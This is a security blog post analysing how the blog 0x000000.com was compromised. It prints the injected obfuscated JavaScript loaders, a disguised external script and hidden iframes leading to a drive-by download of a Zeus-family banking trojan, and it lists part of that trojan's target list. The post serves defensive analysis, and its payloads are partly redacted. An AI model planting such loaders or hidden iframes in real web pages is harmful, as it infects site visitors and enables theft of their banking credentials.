Today I saw that the front page of 0x000000.com looked empty. Was I going to spend a day without an interesting article to read? No, it wasn't possible!

A quick check of the source code revealed that the main page of this rather famous blog presented some obfuscated Javascript and a call to a suspicious Javascript file called webanalytics.js:

<script src="http://safe.google-xxxxxxxxx.com/webanalytics.js"></script>
<script>
function v47f05eb5a54fc(v47f05eb5a5505)
{ var v47f05eb5a5510=16;
return(parseInt(v47f05eb5a5505,v47f05eb5a5510));}
function v47f05eb5a5544(v47f05eb5a554a)
{  var v47f05eb5a5550=''; for(v47f05eb5a5556=0;
v47f05eb5a5556<v47f05eb5a554a.length; v47f05eb5a5556+=2)
{ 
v47f05eb5a5550+=(String.fromCharCode(v47f05eb5a54fc(v47f05eb5a554a.substr(v47f05eb5a5556, 2))));}
return v47f05eb5a5550;}
document.write(v47f05eb5a5544('3C5343524950543E77696E646F772E7374617475733D2
7446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D37623
63731207372633D5C2768747...'));</script>

whereas the webanalytics.js contained:

function google_irl(google_ryg,google_famas) {
var google_xen = "";
for (var i = 0 ; i < google_ryg.length; ++i)
google_xen += String.fromCharCode(google_famas ^ google_ryg.charCodeAt(i));
return google_xen; }
function google_ritn(google_ftak) { eval(google_ftak); return;}
google_ritn(google_irl("\xcb\xd5\xd2\xd8\xd3\xcb\x92\xcf\xc8\xdd\xc8\xc9\xcf\x81
\x9e\xf8\xd3\xd2\xd9\x9e\x87\xb1\xb6\xd8\xd3\xdf\xc9\xd1\xd9\xd2\xc8\x92\xcb\xce
\xd5\xc8\xd9\x94\x9b\x80\xd5\x9b\x97\x9b\xda\xce\xdd\x9b\x97\x9b\xd1\xd9\x9c\xcf
\xce\x9b\x97\x9b\xdf\x81\x9e\x9b\x97\xc9\xd2\xd9\xcf\xdf\xdd\xcc\xd9\x94\x9b\xd4
\xc8\xc8\xcc\x99\x8f\xfd\x93\x93\x8e\x8c\x8d\x92\x8e\x8d\x84\x92\xxx\xxx\xxx\xxx
\xxx\xxx\xxx\x93\xcb\xd9\xde\xdd\xd2\xdd\xd0\xc5\xc8\xd5\xdf\xcf\x93\xdf\xd3\xc9
\xd2\xc8\x92\xcc\xd4\xcc\x99\x8f\xfa\xd3\x99\x8f\xf8\x8d\x9b\x95\x97\x9b\x9e\x9c
\xcb\xd5\xd8...", 188));

Those 2 scripts happened to be, as expected, 2 i-frames pointing towards a malicious website. This website is said to be in panama, according to the whois record of the ip address, but the domain is resolved by a Russian server. As for the owner, he is using a pseudo, has a Russian email address and is apparently living in Germany. Too much to believe...

The 2 i-frames looked like:

<iframe name=7b671 src='http://url/?100313d5ff' 
width=305 height=340 style='display: none'></iframe>

and

<iframe src="http://201.218.xxx.xxx/webanalytics/count.php?o=1" 
width="0" height="0" style="display:none">

Those i-frames, so widely spread nowadays, are often a sign of a drive-by-download situation. In that case, after a few exploits, a windows executable file is pushed to the browser and executed without any warning. This file (here called getexe.exe) downloads, as its name implies, another executable file called upda.exe. This file is the trojan horse, and will need its configuration file to know the targets. This malware, of the family of ntos/prg/wsnpoem/zeus, is a password stealer targeting banks.

The configuration file is encrypted. Once deciphered (on the fly by the malware), it shows all the targets. Among some of the well-known banking institutions, it seems that some more targets have been added:

...
citibank.ru_balance: section 3
http://login.osmp.ru/*
http://www.osmp.ru/dealer/index.php*
https://www.e-gold.com/acct/acct.asp
https://www.e-gold.com/acct/li.asp
https://www.e-gold.com/acct/balance.asp
https://www.moneybookers.com/app/my_account.pl
https://www.epassporte.com/secure/epassporte.cgi
https://light.webmoney.ru/Default.aspx?l=*
http://money.yandex.ru/*
...

Once again, we learn that being a computer security professional doesn't mean you cannot be hacked. No matter how secure you feel, you should always stay up to date on every aspect of your computer security : run as less services as possible, upgrade your software every time an upgrade is out, run internal audit as often as you can to detect a potentially bad behaviour from your servers, have good IDS/IPS with rules that you understand ...

A high number of popular websites have been hacked recently, through different techniques, supplying unknown malware to their visitors. This easy way of spreading malware will be used more and more.

Today's attack was not a great movie but was somehow something very usual. I hope public awareness and developers' cautiousness will help lower the number of attacks and their impact.

Update: We exchanged some e-mails yesterday with the owner of 0x000000.com , who's been bringing some facts to our attention. At first, 0x000000.com is hosted on a shared server. Then he pointed out that many other domains hosted on the same server had been hacked, which proves that the attack was not targeted, but rather generic. We thank him for this information, and once again we encourage you to read his writings, which are of great interest.